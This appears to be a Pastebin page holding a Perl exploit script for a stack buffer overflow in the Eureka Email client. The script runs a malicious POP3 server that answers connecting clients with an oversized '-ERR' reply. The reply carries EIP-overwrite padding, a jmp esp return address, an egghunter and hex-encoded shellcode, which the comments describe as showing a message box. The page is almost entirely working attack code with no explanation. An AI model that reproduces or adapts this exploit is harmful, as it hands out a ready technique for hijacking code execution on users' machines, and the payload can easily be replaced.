SHARE
TWEET

Untitled

a guest Jun 22nd, 2017 101 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. use Socket;
  2. #fill out the local IP or hostname
  3. #which is used by Eureka EMail as POP3 server
  4. #note : must be exact match !
  5.  
  6. my $localserver = "10.0.1.6";
  7. #calculate offset to EIP
  8. my $junk = "A" x (723 - length($localserver));
  9. my $ret = pack('V',0x7E47BCAF); #jmp esp from user32.dll
  10. my $padding = "\x90" x 300;
  11. my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
  12. "w00t". #this is the marker/tag
  13. "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  14.  
  15. # xsploited security msgbox! shellcode :D
  16. my $shellcode = ("\x33\xc9\xba\x8d\x4c\x87\x06\xdb\xde\xd9\x74\x24\xf4\xb1\x45".
  17. "\x5f\x31\x57\x13\x03\x57\x13\x83\xef\xfc\xe2\x78\x95\x6c\x9d".
  18. "\x5b\x52\x57\x56\x6a\x49\x25\xe1\xbd\xa4\x2e\x85\xcc\x06\x24".
  19. "\xef\x22\xec\x4c\x0c\xb1\xb4\xb8\xa7\xbb\x18\x32\x81\x7b\x16".
  20. "\x5c\x9b\x88\xf1\x5d\xb2\x91\xe3\x3e\xbf\x01\xc0\x9a\x34\x9c".
  21. "\x34\x68\x1e\x36\x3d\x6f\x75\xcd\xf7\x77\x02\x8b\x27\x89\xff".
  22. "\xc8\x1c\xc0\x74\x3a\xd6\xd3\x64\x73\x17\xe2\xb8\x8f\x4b\x81".
  23. "\xf9\x1b\x93\x4b\x36\xee\x9a\x8c\x22\x04\xa7\x6e\x91\xcc\xad".
  24. "\x6f\x52\x56\x6a\x71\x8e\x00\xf9\x7d\x1b\x47\xa7\x61\x9a\xbc".
  25. "\xd3\x9e\x17\x43\x0c\x17\x63\x67\xd0\x49\xaf\xd5\xe0\xa0\xfb".
  26. "\x90\x14\x3b\xc1\xca\x58\x72\xc8\xe6\x37\x63\x4b\x09\x48\x8c".
  27. "\xfd\xb0\xb3\xc8\x80\xe2\x5e\x5d\xfa\x0e\xbb\xf0\xec\xa0\x3c".
  28. "\x0b\x13\x35\x87\xfc\x84\x29\x64\xdd\x15\xd9\x47\x2f\xb8\x7d".
  29. "\xc0\x3a\xb7\x18\x62\x4d\x6b\xc6\x88\xc4\x72\x50\x72\x83\x7e".
  30. "\xd5\x4e\x7c\xc4\x4d\xec\x30\x86\x0a\xed\xee\xa4\xfc\x6f\x10".
  31. "\xb7\x03\x07\xb6\x68\xdb\xf8\x2e\x0d\x68\x9c\xcd\xa5\xe1\x37".
  32. "\x66\x53\x95\xbf\xf5\xeb\x09\x71\x21\x83\x8d\x55\xd9\x1d\xce".
  33. "\xfe\x95\x64\x31\xa7\x3d\xf4\x44\x25\xd7\x92\xc2\xe9\x54\x06".
  34. "\x62\x85\xf3\xbc\x17\x31\x7c\x4e\xa7\xad\x4d\x79\xcf\x62\x8a".
  35. "\x6a\x46\x9b\xe3\x5e\x0a\x0f\x55\x0d\x55\x7f\x64\x71\xf9\x7f".
  36. "\xd2\x79");
  37.  
  38. my $payload=$junk.$ret.$egghunter.$padding."w00tw00t".$shellcode;
  39.  
  40.  
  41. #set up listener on port 110
  42. my $port=110;
  43. my $proto=getprotobyname('tcp');
  44. socket(SERVER,PF_INET,SOCK_STREAM,$proto);
  45. my $paddr=sockaddr_in($port,INADDR_ANY);
  46. bind(SERVER,$paddr);
  47. listen(SERVER,SOMAXCONN);
  48. print "[+] Listening on tcp port 110 [POP3]... \n";
  49. print "[+] Configure Eureka Mail Client to connect to this host\n";
  50. my $client_addr;
  51. while($client_addr=accept(CLIENT,SERVER))
  52. {
  53.   print "[+] Client connected, sending evil payload\n";
  54.   while(1)
  55.   {
  56.      print CLIENT "-ERR ".$payload."\n";
  57.      print "    -> Sent ".length($payload)." bytes\n";
  58.   }
  59. }
  60. close CLIENT;
  61. print "[+] Connection closed\n";
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top